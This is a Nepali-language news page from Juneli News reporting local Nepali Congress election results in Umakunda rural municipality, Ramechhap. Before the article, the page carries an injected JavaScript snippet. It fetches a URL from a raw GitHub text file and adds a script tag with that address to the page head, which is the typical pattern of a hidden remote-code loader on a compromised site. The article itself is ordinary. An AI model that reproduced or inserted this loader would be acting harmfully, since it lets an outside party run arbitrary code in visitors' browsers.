;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); उमाकुण्ड गाउँपालिका सभापतिमा हिक्मत सुनुवार विजयी – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • उमाकुण्ड गाउँपालिका सभापतिमा हिक्मत सुनुवार विजयी
Breaking News

उमाकुण्ड गाउँपालिका सभापतिमा हिक्मत सुनुवार विजयी

जुनेली न्युज, रामेछाप। नेपाली काँग्रेसको १४ महाधिवेशनको लहर चल्दै गर्दा रामेछाप उमाकुण्ड गाउँपालिकाको  सभापतीमा हिक्मत सुनुवारले विजय हात परेका छन् । उनले  ६६ मत लिएर २३ मतले विजय भएका हुन्।

त्यसैगरी उप-सभापतिमा बाबुराम कटुवाल ५०, सरण कुमार सुनुवार ४६ र सचिवमा हाकिम बस्नेत ५०, नुरी शेर्पा ८९ मतका साथ विजयी भएका छन्।

उमाकुण्डमा सहमति नभए पनि आज दिउँसो देखि चुनाव भएको थियो।

फेसबुक प्रतिक्रियाहरु